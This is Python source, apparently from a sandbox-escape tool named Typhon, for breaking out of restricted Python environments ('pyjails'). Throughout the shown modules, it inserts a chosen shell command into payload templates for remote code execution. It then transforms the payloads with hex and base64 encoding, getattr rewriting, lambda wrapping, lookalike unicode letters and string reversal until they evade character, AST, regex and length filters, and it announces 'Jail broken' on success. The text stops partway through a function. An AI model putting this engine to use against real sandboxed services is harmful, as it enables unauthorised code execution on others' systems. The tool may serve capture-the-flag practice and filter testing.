import re
import sys
import inspect
import builtins

from .bypasser import *
from string import ascii_letters, digits
from types import FunctionType, ModuleType

prefix = ("USER_DEFINED_", "MODULE_", "EXCEPTION_", "BUILTINS_", "FILECONTENTS")
fixed_tag = [
    "BUILTINS_SET",
    "BUILTINS_SET_CHANGED",
    "UNKNOWN",
    "TYPE",
    "OBJECT",
    "GENERATOR",
    "EXCEPTION",
]


def get_name_and_object_from_tag(tag: str, tagged_scope: dict):
    """
    Get the name and object from a tag.

    :param tag: The tag to analyze
    :return: A tuple with the name and object
    """
    output = []
    for i in tagged_scope:
        if tagged_scope[i][1] == tag:
            output.append((i, tagged_scope[i][0]))
    return output


def find_object(object: object, tagged_scope: dict):
    """
    Find an object in a tagged scope.

    :param object: The object to find
    :param tagged_scope: The tagged scope to search in
    :return: name of the object, None if not found
    """
    from .Typhon import original_scope
    for i in tagged_scope:
        if eval(i, original_scope) == object:
            return i
            
    return None

def exec_with_returns(code: str, scope: dict):
    """
    Execute a code string with a given scope and return the value of
    the last expression.

    :param code: The code to execute
    :param scope: The scope to use for execution
    :return: The returned value of the code
    """
    scope["__return__"] = None
    lines = code.split("\n")
    if not lines:
        return None
    last_line = lines[-1]
    if ";" in last_line:
        statements = last_line.split(";")
        last_statement = statements[-1].strip()
        statements[-1] = f"__return__ = {last_statement}"
        lines[-1] = ";".join(statements)
    else:
        lines[-1] = f"__return__ = {last_line}"
    modified_code = "\n".join(lines)
    try:
        exec(modified_code, scope)
        return scope.get("__return__")
    except Exception as e:
        logger.debug(f"Error executing code when testing payload {code}: {e}")
        return None


def merge_dicts(dict1: dict, dict2: dict) -> dict:
    """
    Merge dicts. Not using | for backwards compatibility.
    """
    if type(dict1) != dict:
        return dict2
    if type(dict2) != dict:
        return dict1
    return {**dict1, **dict2}


def tag_variables(variables, change_in_builtins) -> list:
    """
    Tag each item in a variable namespace according to its type

    :param variables: The variable namespace to analyze (typically globals() or locals())
    :param change_in_builtins: The list of var changed included in __builtins__
    :return: Dictionary with tagging information
    """
    tagged = {}
    builtins_set = set(dir(builtins))

    for name, obj in variables.items():
        # Check if it's a builtin object
        if name in builtins_set:
            tagged[name] = f"BUILTINS_{name}"
            continue
        if obj == object:
            tagged[name] = "OBJECT"
            continue
        if obj == type:
            tagged[name] = "TYPE"
            continue
        if obj.__class__ == (a for a in ()).__class__:
            tagged[name] = "GENERATOR"
            continue
        if isinstance(obj, dict) and set(obj.keys()) == set(dir(builtins)):
            if change_in_builtins:
                tagged[name] = "BUILTINS_SET_CHANGED"
            else:
                tagged[name] = "BUILTINS_SET"
            # Actually, BUILTINS_SET should be BUILTINS_DICT......
            # But fuck it, no one cares.
            continue
        # Check if it's a user-defined function
        if isinstance(obj, FunctionType) and obj.__module__ != "builtins":
            # Check if it's a lambda function
            if obj.__name__ == "<lambda>":
                tagged[name] = "USER_DEFINED_LAMBDA"
            else:
                tagged[name] = "USER_DEFINED_FUNCTION"
            continue
        # Check if it's a module
        if isinstance(obj, ModuleType):
            tagged[name] = "MODULE_{}".format(obj.__name__.upper())
            continue
        # Check if it's a class
        if inspect.isclass(obj):
            # Check if it's an exception
            if obj == Exception:
                tagged[name] = "EXCEPTION"
            if issubclass(obj.__class__, BaseException):
                tagged[name] = "EXCEPTION_{}".format(obj.__name__.upper())
                continue
            tagged[name] = "USER_DEFINED_CLASS"
            continue
        # Check for user-defined variables
        try:
            if hasattr(obj, "__name__"):
                obj_name = obj.__name__
            elif hasattr(obj, "__class__"):
                obj_name = obj.__class__.__name__
            else:
                obj_name = str(obj)
            # Sanitize object name (keep only alphanumeric, replace others with _)
            obj_name = "".join(c if c.isalnum() else "_" for c in obj_name).upper()
            tagged[name] = "USER_DEFINED_{}".format(obj_name)
        except:
            tagged[name] = "UNKNOWN"  # If we can't tag it, it's unknown
    return tagged


def tag_scope(scope: dict, change_in_builtins: int) -> dict:
    """
    Tag each item in a scope (e.g. globals(), locals()) according to its type

    :param scope: The scope to analyze
    :param change_in_builtins: The list of var changed included in __builtins__
    :return: Dictionary with tagging information
    """
    return {
        k: [v, tag_variables({k: v}, change_in_builtins)[k]] for k, v in scope.items()
    }


def is_tag(string: str) -> bool:
    """
    Check if a string is a valid tag

    :param string: The string to check
    :return: True if the string is a valid tag, False otherwise
    """
    return string.startswith(prefix) or string in fixed_tag


def parse_payload_list(
    payload: List[list],
    char_blacklist: List[str],
    allow_unicode_bypass: bool,
    local_scope: dict,
    cmd=Union[str, None],
) -> list:
    """
    Parse a list of payloads (parse tags)

    :param payload: the payload to parse
    :param char_blacklist: the list of banned characters
    :param allow_unicode_bypass: if unicode bypasses are allowed.
    :param local_scope: the local scope to use for tag analysis
    :param cmd: the final RCE command to execute, default None
    :return: filtered list of payloads, with its tags e.g. ['TYPE.__base__', {'TYPE': 'int.__class__'}]
    """
    from .Typhon import generated_path, allowed_letters

    output = []
    allowed_builtin_obj = [
        i for i in ["[]", "()", "{}", "''", '""'] if i not in char_blacklist
    ]  # list, tuple, dict, string
    allowed_objects = [
        i
        for i in local_scope
        if local_scope[i][0].__class__ == type and i not in char_blacklist
    ]
    allowed_objects.sort(key=len)
    # builtin_obj.extend(allowed_digits)  # This line is only here to tell you that
    # digits do not work in some cases (like 1.__class__)

    for path in payload:
        tags = path[1]
        payload = path[0]
        if cmd:
            if "COMMAND" in payload:
                payload = payload.replace("COMMAND", f"'{cmd}'")
            if "CMD_FILE" in payload:
                payload = payload.replace(
                    "CMD_FILE", "'/bin/" + cmd.split(" ")[0] + "'"
                )
            if "UNFOLD_CMD_ARGS" in payload:
                if " " not in cmd:
                    payload = payload.replace("UNFOLD_CMD_ARGS", "")
                payload = payload.replace(
                    "UNFOLD_CMD_ARGS",
                    ",".join(["'" + i + "'" for i in cmd.split(" ")[1:]]),
                )
        if "RANDOMVARNAME" in payload:
            if allowed_letters:
                payload = payload.replace("RANDOMVARNAME", allowed_letters[0])
            # unicode bypass
            if allow_unicode_bypass:
                payload = payload.replace("RANDOMVARNAME", generate_unicode_char())
        if "RANDOMSTRING" in payload:
            if allowed_letters:
                payload = payload.replace(
                    "RANDOMSTRING", "'" + allowed_letters[0] + "'"
                )
            # unicode bypass
            if allow_unicode_bypass:
                payload = payload.replace(
                    "RANDOMSTRING", "'" + generate_unicode_char() + "'"
                )
        if "BUILTINOBJ" in payload:  # TODO
            # note: we assume that OBJ tag is in the beginning of the payload
            obj = payload.split(".")[0] + "." + payload.split(".")[1]
            if allowed_builtin_obj:
                payload = payload.replace("BUILTINOBJ", choice(allowed_builtin_obj))
            else:
                continue
        if "BUILTINtype" in payload:
            if allowed_objects:
                tags["BUILTINtype"] = allowed_objects[0]
            else:
                continue
        if "GENERATOR" in payload:
            if "GENERATOR" in generated_path:
                tags["GENERATOR"] = generated_path["GENERATOR"]
            if not generated_path["GENERATOR"]:
                continue
        if "TYPE" in payload:
            if "TYPE" in generated_path:
                tags["TYPE"] = generated_path["TYPE"]
            if not generated_path["TYPE"]:
                continue
        if "OBJECT" in payload:
            if "OBJECT" in generated_path:
                tags["OBJECT"] = generated_path["OBJECT"]
            if not generated_path["OBJECT"]:
                continue
        if "BUILTINS_SET" in payload:
            if "BUILTINS_SET" in generated_path:
                tags["BUILTINS_SET"] = generated_path["BUILTINS_SET"]
            if not generated_path["BUILTINS_SET"]:
                continue
        if "MODULE_BUILTINS" in payload:
            if "MODULE_BUILTINS" in generated_path:
                tags["MODULE_BUILTINS"] = generated_path["MODULE_BUILTINS"]
            if not generated_path["MODULE_BUILTINS"]:
                continue
        output.append([payload, tags])

    return output


def filter_path_list(path_list: list, tagged_scope: dict) -> List[list]:
    """
    return a filtered list of payloads based on the scope

    :param path_list: list of payloads to filter
    :param scope: the scope to filter by
    :return: filtered list of payloads, with its tags e.g. ['TYPE.__base__', {'TYPE': 'int.__class__'}]
    """

    def check_need(
        path: Union[str, list], tagged_scope: dict, need: str
    ) -> Union[str, None]:
        """
        Check if a path needs something in the scope

        :param path: the path to check
        :param scope: the scope to check in
        :return: the payload if the need is met, None otherwise
        """
        if isinstance(path, list):
            tags = path[1]
            path = path[0]
        else:
            tags = {}
        if need in sys.modules:  # need is a module
            need_module = sys.modules[need]
            module_dict = get_module_from_tagged_scope(tagged_scope)
            if need_module in module_dict.values():
                tags[need] = get_name_and_object_from_tag(
                    "MODULE_" + need.upper(), tagged_scope
                )[0][
                    0
                ]  # The module is already imported, we don't need to import it again
                return [path, tags]
            # TODO: check if module is already imported, if not, check if we can import modules
        elif need in dir(builtins):  # need is a builtin
            need_obj = __builtins__[need]
            for i in tagged_scope:
                if tagged_scope[i][0] == need_obj:
                    return [path.replace(need, i), tags]
                if tagged_scope[i][1] == "BUILTINS_SET":
                    tags[need] = i + f"['{need}']"
                    return [path, tags]
                if tagged_scope[i][1] == "MODULE_BUILTINS":
                    tags[need] = i + f".{need}"
                    return [path, tags]
        elif is_tag(need):  # need is a tag
            for i in tagged_scope:
                if tagged_scope[i][1] == need:
                    if need in path:
                        tags[need] = i
                    return [path, tags]
        else:  # need is a path
            pass  # TODO
        return None

    filtered_list = []
    for path in path_list:
        path, need = path[0], path[1]
        if need:  # we need something in this path
            if "," in need:  # we need multiple things in this path
                need = need.split(",")
                for i in need:
                    path = check_need(path, tagged_scope, i)
                    if path is None:
                        break
                if path:
                    filtered_list.append(path)
            elif "|" in need:  # we need one of the things in this path
                need = need.split("|")
                for i in need:
                    path_ = check_need(path, tagged_scope, i)
                    if path_:
                        filtered_list.append(path_)
                        break
            else:  # we need one thing in this path
                path = check_need(path, tagged_scope, need)
                if path:
                    filtered_list.append(path)
        else:  # we don't need anything in this path
            filtered_list.append([path, {}])
    return filtered_list


def is_blacklisted(payload) -> bool:
    """
    Check if a payload is blacklisted

    :param banned_chars: list of banned chars
    :param banned_AST: list of banned AST
    :param banned_re: banned regex
    :param max_length: max length of the payload
    :return: True if the payload is blacklisted, False otherwise
    """
    from .Typhon import banned_ast_, banned_chr_, banned_re_, max_length_

    ast_banned = False
    re_banned = False
    if max_length_ == None:
        length_check = False
        max_length = 0
    else:
        length_check = True
        max_length = max_length_
    for bAST in banned_ast_:
        if any(isinstance(node, bAST) for node in ast.walk(ast.parse(payload))):
            ast_banned = True
            break
    if banned_re_:
        for b_re in banned_re_:
            if re.search(b_re, payload):
                re_banned = True
                break
    return (
        any(i in payload for i in banned_chr_)  # banned character check
        or ast_banned  # AST check
        or re_banned  # regex check
        or (len(payload) > max_length and length_check)
    )  # max length check


def try_bypasses(
    pathlist,
    banned_chars,
    banned_AST,
    banned_re,
    max_length,
    allow_unicode_bypass,
    local_scope,
    cmd=None,
) -> list:
    """
    Try to bypass each payload in the pathlist

    :param pathlist: list of payloads to try to bypass
    :param banned_chars: list of banned chars
    :param banned_AST: list of banned AST
    :param banned_re: banned regex
    :param max_length: max length of the payload
    :param allow_unicode_bypass: if unicode bypasses are allowed.
    :param local_scope: the local scope to use for tag analysis
    :param cmd: command to RCE (in the final step, otherwise None)
    :return: list of successful payloads
    """
    from .Typhon import log_level_

    successful_payloads = []
    pathlist = parse_payload_list(
        pathlist, banned_chars, allow_unicode_bypass, local_scope, cmd
    )
    if log_level_ == "DEBUG":
        Total = 0
    else:
        Total = len(pathlist)
    for i, path in enumerate(pathlist):
        progress_bar(i + 1, Total)
        for _ in BypassGenerator(
            path, allow_unicode_bypass=allow_unicode_bypass, local_scope=local_scope
        ).generate_bypasses():
            if not is_blacklisted(_):
                successful_payloads.append(_)
            continue
    if pathlist and log_level_ != "DEBUG":
        sys.stdout.write("\n")
    successful_payloads.sort(key=len)
    return successful_payloads


def progress_bar(current, total, bar_length=80):
    """
    Progress bar function

    Note: sometime this may cause gliches in your console (somehow, idk).
    That's bad, but I don't want to rely on `tqdm` just for this simple feature.

    Not avaliable in debug mode. In debug mode, `total` is force to 0
    """
    if total == 0:
        return
    percent = float(current) * 100 / total
    arrow = "=" * int(percent / 100 * bar_length - 1) + ">"
    spaces = " " * (bar_length - len(arrow))

    sys.stdout.write(
        f"\rBypassing ({current}/{total}): [{arrow + spaces}] {percent:.1f}%"
    )
    sys.stdout.flush()


def bypasses_output(
    bypassed_payload: Union[str, list] = None, generated_path: list = []
):
    """
    Print a fancy output of the bypassed payload
    if bypassed_payload is set, it means we RCE successfully, the program ends.
    if generated_path is set, it means we have some progress but not RCE,
    the program ends with the those progress.

    :param bypassed_payload: the bypassed payload, if it's a list, it means we have
    to print all the generated payloads
    :param generated_path: the generated path
    :return: None
    """
    from .Typhon import achivements, reminder

    print("\n")
    bypassed_path, printed_reminder = [], []
    if isinstance(bypassed_payload, str):
        bypassed_payload = [bypassed_payload]
    if not bypassed_payload is None:
        bypassed_path.extend(bypassed_payload)
    bypassed_path.extend(achivements.values())
    for i in bypassed_path:
        if isinstance(i, list):
            i = i[0]
        if i is None:
            continue
        for j in reminder:
            if j in i and j not in printed_reminder:
                printed_reminder.append(j)
                print("\033[33mWARNING [!] " + reminder[j] + "\033[0m")
    print("\n")
    print("-----------Progress-----------")
    print("\n")
    for i in achivements:
        payload_len = achivements[i][1]
        if payload_len > 1:
            print(
                "\033[34m" + i + "(" + str(payload_len) + " payloads found): \033[0m",
                end="",
            )
        else:  # only one payload or no payload found
            print(
                "\033[34m" + i + "(" + str(payload_len) + " payload found): \033[0m",
                end="",
            )
        best_payload = str(achivements[i][0])
        if "\n" in best_payload:
            print("\n" + best_payload)
        else:
            print(best_payload)
    print("\n")
    print("-----------Progress-----------")
    print("\n")
    if bypassed_payload:
        print("\033[36m+++++++++++Jail broken+++++++++++\033[0m")
        print("\n")
        for i in bypassed_payload:
            print(i)
            for j in reminder:
                if j in i:
                    print("\033[33mReminder: " + reminder[j] + "\033[0m")
            print("")
        print("")
        print("\033[36m+++++++++++Jail broken+++++++++++\033[0m")
        exit(0)
    if generated_path:
        return generated_path


def get_module_from_tagged_scope(tagged_scope: dict) -> dict:
    """
    Get the module from the tagged scope

    :param tagged_scope: the tagged scope
    :return: the module from the tagged scope
    e.g.: {'os': <module 'os' (built-in)>}
    """
    module_dict = {}
    for i in tagged_scope:
        if "MODULE_" in tagged_scope[i][1]:
            module_name = tagged_scope[i][1].split("_")[1].lower()
            module_dict[module_name] = tagged_scope[i][0]
    return module_dict



import ast
import base64

from .Typhon import logger
from typing import Union, List
from copy import copy, deepcopy
from string import ascii_letters
from random import randint, choice
from functools import wraps, reduce


def remove_duplicate(List) -> list:
    """
    Remove duplicate items in list
    """
    return list(set(List))


def unescape_double_backslash(string) -> str:
    """
    Unescape double backslashes in a string

    :param string: the string to unescape
    :return: the unescaped string
    """
    return string.replace("\\\\", "\\")


def generate_unicode_char():
    """
    Generate a random Unicode character.

    Returns:
        str: A random Unicode character.
    """
    val = randint(0x4E00, 0x9FBF)
    return chr(val)


def flatten_add_chain(n: ast.AST):
    parts = []

    def collect(x):
        if isinstance(x, ast.BinOp) and isinstance(x.op, ast.Add):
            collect(x.left)
            collect(x.right)
        else:
            parts.append(x)

    collect(n)
    return parts


def general_bypasser(func):
    """
    Decorator for general bypassers.
    """
    func._is_bypasser = True

    @wraps(func)
    def check(self, payload):
        for i in payload[1]:
            if i == func.__name__:
                return None  # Do not do the same bypass
        try:
            return (
                func(self, payload[0])
                .replace(" + ", "+")
                .replace(", ", ",")
                .replace(": ", ":")
            )
        except RecursionError:
            logger.debug(
                f"Bypasser {func.__name__} got recurrence error on {payload[0]}"
            )
            return None

    return check


def bypasser_not_work_with(bypasser_list: List[str]):
    """
    Decorator for bypassers which do not work with any other bypasser in the list.
    """

    def _(func):
        func._is_bypasser = True

        @wraps(func)
        def check(self, payload):
            for i in payload[1]:
                if i == func.__name__:
                    return None  # Do not do the same bypass
            for i in payload[1]:
                for j in bypasser_list:
                    if i == j:
                        return None  # Do not work with this
            try:
                return (
                    func(self, payload[0])
                    .replace(" + ", "+")
                    .replace(", ", ",")
                    .replace(": ", ":")
                )
            except RecursionError:
                logger.debug(
                    f"Bypasser {func.__name__} got recurrence error on {payload[0]}"
                )
                return None

        return check

    return _


def recursion_protection(func):
    """
    Decorator for bypassers which may cause recursion error.
    """

    @wraps(func)
    def check(self, payload):
        try:
            return (
                func(self, payload)
                .replace(" + ", "+")
                .replace(", ", ",")
                .replace(": ", ":")
            )
        except RecursionError:
            logger.debug(f"Bypasser {func.__name__} got recurrence error on {payload}")
            return payload

    return check


def bypasser_must_work_with(bypasser_list: List[str]):
    """
    Decorator for bypassers which must work with at least one bypasser in the list.
    """

    def _(func):
        func._is_bypasser = True

        @wraps(func)
        def check(self, payload):
            for i in payload[1]:
                if i == func.__name__:
                    return None  # Do not do the same bypass
            success = False
            for j in bypasser_list:
                for k in payload[1]:
                    if k == j:
                        success = True
                        break
                if success:
                    break
            if not success:
                return None  # Do not work without this
            try:
                return func(self, payload[0]).replace(" + ", "+").replace(", ", ",")
            except RecursionError:
                logger.debug(
                    f"Bypasser {func.__name__} got recurrence error on {payload[0]}"
                )
                return None

        return check

    return _


class BypassGenerator:
    def __init__(
        self,
        payload: list,
        allow_unicode_bypass: bool,
        local_scope: dict,
        _allow_after_tagging_bypassers: bool = True,
        search_depth: Union[int, None] = None,
    ):
        """
        Initialize the bypass generator with a payload.

        Args:
            :param payload: The Python expression/statement to be transformed
            :param allow_unicode_bypass: if unicode bypasses are allowed
            :param local_scope: tagged local scope
        """
        self.payload = payload[0]
        self.tags = payload[1]
        self.allow_unicode_bypass = allow_unicode_bypass
        self.local_scope = local_scope
        self.bypass_methods, self.after_tagging_bypassers = [], []
        self._allow_after_tagging_bypassers = _allow_after_tagging_bypassers
        if search_depth is None:
            from .Typhon import search_depth
        self.search_depth = search_depth
        for method_name in dir(self):
            method = getattr(self, method_name)
            if callable(method):
                if getattr(method, "_is_bypasser", False):
                    self.bypass_methods.append(method)
                elif getattr(method, "is_after_tagging_bypasser", False):
                    self.after_tagging_bypassers.append(method)

    def generate_bypasses(self):
        """
        Generate all possible bypass variants by applying each transformation method.

        Returns:
            list: List of unique transformed payloads
        """
        from .utils import is_blacklisted

        true_paylaod = copy(self.payload)
        for i in self.tags:
            true_paylaod = true_paylaod.replace(i, self.tags[i])
        if not is_blacklisted(true_paylaod):
            return [true_paylaod]  # in case of the challenge is so easy
        output = []
        bypassed = [self.payload]

        # Generate combinations of dmultiple bypasses
        combined = self.combine_bypasses(
            [self.payload, []], self.payload, self.search_depth
        )
        bypassed.extend(combined)
        bypassed = remove_duplicate(bypassed)  # Remove duplicates
        # bypassed.sort(key=len)
        for i in bypassed:
            for j in self.tags:
                tag_unicode_1 = self.unicode_bypasses(
                    j, "𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏𝒜ℬ𝒞𝒟ℰℱ𝒢ℋℐ𝒥𝒦ℒℳ𝒩𝒪𝒫𝒬ℛ𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵"
                )
                tag_unicode_2 = self.unicode_bypasses(
                    j, "𝘢𝘣𝘤𝘥𝘦𝘧𝘨𝘩𝘪𝘫𝘬𝘭𝘮𝘯𝘰𝘱𝘲𝘳𝘴𝘵𝘶𝘷𝘸𝘹𝘺𝘻𝘈𝘉𝘊𝘋𝘌𝘍𝘎𝘏𝘐𝘑𝘒𝘓𝘔𝘕𝘖𝘗𝘘𝘙𝘚𝘛𝘜𝘝𝘞𝘟𝘠𝘡"
                )
                if (
                    j not in i
                    and tag_unicode_1 not in i
                    and tag_unicode_2 not in i
                    and self._allow_after_tagging_bypassers
                ):
                    raise ValueError(f"Tag {j} not found in payload {i}")
                i = i.replace(j, self.tags[j])
                i = i.replace(tag_unicode_1, self.tags[j])
                i = i.replace(tag_unicode_2, self.tags[j])
            output.append(i)
        if self._allow_after_tagging_bypassers:
            from .utils import find_object

            output.append(self.numbers_to_binary_base(i))
            output.append(self.numbers_to_hex_base(i))
            output.append(self.numbers_to_oct_base(i))
            if find_object(exec, self.local_scope):
                output.extend(
                    BypassGenerator(
                        [self.repr_to_exec(i), {}],
                        self.allow_unicode_bypass,
                        self.local_scope,
                        _allow_after_tagging_bypassers=False,
                        search_depth=self.search_depth // 2,
                    ).generate_bypasses()
                )
            if find_object(eval, self.local_scope):
                output.extend(
                    BypassGenerator(
                        [self.repr_to_eval(i), {}],
                        self.allow_unicode_bypass,
                        self.local_scope,
                        _allow_after_tagging_bypassers=False,
                        search_depth=self.search_depth // 2,
                    ).generate_bypasses()
                )
        output = remove_duplicate(output)
        return output

    def combine_bypasses(
        self, payload: List[Union[str, list]], initial_payload: str, depth: int
    ):
        """
        Recursively combine multiple bypass methods for deeper obfuscation.

        Args:
            payload (list): Current list of [payload string, [bypass_method1, bypass_method2, ...]]
            depth (int): Recursion depth limit
            initial_payload (str): Initial payload

        Returns:
            list: Combined transformed payloads
        """
        if depth == 0:
            return [payload[0]]

        variants = []
        for method in self.bypass_methods:
            _ = []
            try:
                new_payload = method(payload)
            except SyntaxError:  # from AST parsing
                logger.debug(
                    f"Bypasser {method.__name__} failed to parse payload: {payload[0]}"
                )
                continue
            if (
                new_payload == payload[0]
                or new_payload is None
                or new_payload in variants
                or new_payload == initial_payload
            ):
                continue
            _ = deepcopy(payload)
            _[1].append(method.__name__)
            variants.append(new_payload)
            variants.extend(
                self.combine_bypasses([new_payload, _[1]], initial_payload, depth - 1)
            )
        return variants

    @general_bypasser
    def encode_string_hex(self, payload):
        """
        Encode strings using hex escapes.
        """

        class Transformer(ast.NodeTransformer):
            def visit_Constant(self, node):
                if isinstance(node.value, str):
                    hex_str = "".join("\\" + f"x{ord(c):02x}" for c in node.value)
                    return ast.Constant(value=hex_str)
                return node

        tree = ast.parse(payload, mode="eval")
        new_tree = Transformer().visit(tree)
        ast.fix_missing_locations(new_tree)
        return unescape_double_backslash(ast.unparse(new_tree))

    @general_bypasser
    def transform_attribute_to_getattr(self, payload: str) -> str:
        """
        'a.b' -> 'getattr(a, "b")'
        """
        from .utils import find_object

        name = find_object(getattr, self.local_scope)
        if name is None:
            return payload
        tree = ast.parse(payload, mode="eval")

        class Transformer(ast.NodeTransformer):
            def visit_Attribute(self, node):
                return ast.Call(
                    func=ast.Name(id=name, ctx=ast.Load()),
                    args=[self.visit(node.value), ast.Constant(value=node.attr)],
                    keywords=[],
                )

        transformer = Transformer()
        transformed_tree = transformer.visit(tree)
        ast.fix_missing_locations(transformed_tree)
        return ast.unparse(transformed_tree)

    @general_bypasser
    def switch_quotes(self, payload: str) -> str:
        """
        Change " to ' and ' to "
        """
        output = ""
        for char in payload:
            if char == "'":
                output += '"'
            elif char == '"':
                output += "'"
            else:
                output += char
        return output

    @general_bypasser
    def encode_string_base64(self, payload):
        """
        Encode strings using base64 decoding.

        Args:
            payload (str): Input payload

        Returns:
            str: Transformed payload
        """
        from .utils import find_object

        base_64_name = find_object(base64, self.local_scope)
        if base_64_name is None:
            return payload

        class Transformer(ast.NodeTransformer):
            def visit_Constant(self, node):
                if isinstance(node.value, str):
                    encoded = base64.b64encode(node.value.encode()).decode()
                    return ast.Call(
                        func=ast.Attribute(
                            value=ast.Call(
                                func=ast.Name(
                                    id=base_64_name + ".b64decode", ctx=ast.Load()
                                ),
                                args=[ast.Constant(value=encoded)],
                                keywords=[],
                            ),
                            attr="decode",
                            ctx=ast.Load(),
                        ),
                        args=[],
                        keywords=[],
                    )
                return node

        tree = ast.parse(payload, mode="eval")
        new_tree = Transformer().visit(tree)
        return ast.unparse(new_tree)

    # @after_tagging_bypasser
    @recursion_protection
    def numbers_to_binary_base(self, payload: str) -> str:
        """
        Convert numbers to binary base (e.g., 42 → 0b101010).
        """
        placeholder = ""
        while placeholder in payload or placeholder == "":
            placeholder = str(randint(1000000, 9999999))

        class Transformer(ast.NodeTransformer):
            def visit_Constant(self, node):
                if isinstance(node.value, int):
                    return ast.Constant(
                        value=f"0b{placeholder}{bin(node.value)[2:]}{placeholder}"
                    )
                return node

        try:
            tree = ast.parse(payload, mode="eval")
            new_tree = Transformer().visit(tree)
            ast.fix_missing_locations(new_tree)
            return (
                ast.unparse(new_tree)
                .replace(f"'0b{placeholder}", "0b")
                .replace(f"{placeholder}'", "")
            )
        except (SyntaxError, AttributeError):
            return payload

    # @after_tagging_bypasser
    @recursion_protection
    def numbers_to_oct_base(self, payload: str) -> str:
        """
        Convert numbers to oct base.
        """
        placeholder = ""
        while placeholder in payload or placeholder == "":
            placeholder = str(randint(1000000, 9999999))

        class Transformer(ast.NodeTransformer):
            def visit_Constant(self, node):
                if isinstance(node.value, int):
                    return ast.Constant(
                        value=f"0o{placeholder}{oct(node.value)[2:]}{placeholder}"
                    )
                return node

        try:
            tree = ast.parse(payload, mode="eval")
            new_tree = Transformer().visit(tree)
            ast.fix_missing_locations(new_tree)
            return (
                ast.unparse(new_tree)
                .replace(f"'0o{placeholder}", "0o")
                .replace(f"{placeholder}'", "")
            )
        except (SyntaxError, AttributeError):
            return payload

    # @after_tagging_bypasser
    @recursion_protection
    def numbers_to_hex_base(self, payload: str) -> str:
        """
        Convert numbers to hex base.
        """
        placeholder = ""
        while placeholder in payload or placeholder == "":
            placeholder = str(randint(1000000, 9999999))

        class Transformer(ast.NodeTransformer):
            def visit_Constant(self, node):
                if isinstance(node.value, int):
                    return ast.Constant(
                        value=f"0x{placeholder}{hex(node.value)[2:]}{placeholder}"
                    )
                return node

        try:
            tree = ast.parse(payload, mode="eval")
            new_tree = Transformer().visit(tree)
            ast.fix_missing_locations(new_tree)
            return (
                ast.unparse(new_tree)
                .replace(f"'0x{placeholder}", "0x")
                .replace(f"{placeholder}'", "")
            )
        except (SyntaxError, AttributeError):
            return payload

    @general_bypasser
    def obfuscate_func_call(self, payload: str) -> str:
        """
        Obfuscate function calls using lambda wrappers with support for multiple arguments.
        """
        from .Typhon import allowed_letters

        class Transformer(ast.NodeTransformer):
            def visit_Call(self, node):
                if isinstance(node.func, ast.Lambda):
                    return node
                num_args = len(node.args)
                try:
                    param_names = [
                        allowed_letters[i] for i in range(num_args + 1)
                    ]  # a, b, c, ...
                except IndexError:
                    return node  # Too many arguments
                lambda_args = [ast.arg(arg=name) for name in param_names]
                call_args = [
                    ast.Name(id=name, ctx=ast.Load()) for name in param_names[1:]
                ]
                lambda_func = ast.Lambda(
                    args=ast.arguments(
                        posonlyargs=[],
                        args=lambda_args,
                        kwonlyargs=[],
                        kw_defaults=[],
                        defaults=[],
                    ),
                    body=ast.Call(
                        func=ast.Name(id=param_names[0], ctx=ast.Load()),
                        args=call_args,
                        keywords=[],
                    ),
                )
                call_args_with_func = [node.func] + node.args

                return ast.Call(func=lambda_func, args=call_args_with_func, keywords=[])

        tree = ast.parse(payload, mode="eval")
        new_tree = Transformer().visit(tree)
        ast.fix_missing_locations(new_tree)
        return ast.unparse(new_tree)

    @bypasser_not_work_with(["string_reversing"])
    def string_slicing(self, payload: str) -> str:
        """
        Break strings into concatenated parts or use slicing.
        """

        class Transformer(ast.NodeTransformer):
            def visit_Constant(self, node):
                if isinstance(node.value, str) and len(node.value) > 1:
                    # Split into character concatenation
                    parts = [ast.Constant(value=c) for c in node.value]
                    new_node = parts[0]
                    for part in parts[1:]:
                        new_node = ast.BinOp(left=new_node, op=ast.Add(), right=part)
                    return new_node
                return node

        tree = ast.parse(payload, mode="eval")
        new_tree = Transformer().visit(tree)
        ast.fix_missing_locations(new_tree)
        return ast.unparse(new_tree)

    @bypasser_not_work_with(["string_slicing"])
    def string_reversing(self, payload):
        """
        Reverse string.
        """

        class Transformer(ast.NodeTransformer):
            def visit_Constant(self, node):
                if isinstance(node.value, str) and len(node.value) > 1:
                    reversed_str = node.value[::-1]
                    slice_node = ast.Subscript(
                        value=ast.Constant(value=reversed_str),
                        slice=ast.Slice(
                            lower=None,
                            upper=None,
                            step=ast.UnaryOp(
                                op=ast.USub(), operand=ast.Constant(value=1)
                            ),
                        ),
                        ctx=ast.Load(),
                    )
                    return slice_node
                return node

        tree = ast.parse(payload, mode="eval")
        new_tree = Transformer().visit(tree)
        ast.fix_missing_locations(new_tree)
        return ast.unparse(new_tree)

    @general_bypasser
    def list_to_getitem(self, payload: str) -> str:
        """
        list[0] -> list.__getitem__(0)
        """

        class Transformer(ast.NodeTransformer):
            def visit_Subscript(self, node):
                if isinstance(node.slice, ast.Slice):
                    slice_args = [
                        (
                            node.slice.lower
                            if node.slice.lower
                            else ast.Constant(value=None)
                        ),
                        (
                            node.slice.upper
                            if node.slice.upper
                            else ast.Constant(value=None)
                        ),
                    ]
                    slice_call = ast.Call(
                        func=ast.Name(id="slice", ctx=ast.Load()),
                        args=slice_args,
                        keywords=[],
                    )
                    slice_arg = slice_call
                elif isinstance(node.slice, ast.Tuple):
                    dims = []
                    for dim in node.slice.dims:
                        if isinstance(dim, ast.Slice):
                            slice_args = [
                                dim.lower if dim.lower else ast.Constant(value=None),
                                dim.upper if dim.upper else ast.Constant(value=None),
                            ]
                            dims.append(
                                ast.Call(
                                    func=ast.Name(id="slice", ctx=ast.Load()),
                                    args=slice_args,
                                    keywords=[],
                                )
                            )
                        else:
                            dims.append(self.visit(dim))
                    slice_arg = ast.Tuple(elts=dims, ctx=ast.Load())
                else:
                    slice_arg = self.visit(node.slice)
                return ast.Call(
                    func=ast.Attribute(
                        value=self.visit(node.value), attr="__getitem__", ctx=ast.Load()
                    ),
                    args=[slice_arg],
                    keywords=[],
                )

        tree = ast.parse(payload, mode="eval")
        new_tree = Transformer().visit(tree)
        ast.fix_missing_locations(new_tree)
        ret = ast.unparse(new_tree).replace(", ", ",")
        if "slice(None,None)" in ret:
            return payload
        return ret

    @general_bypasser
    def replace_semicolon_newlines(self, payload: str) -> str:
        """
        Replace semicolons with newlines.

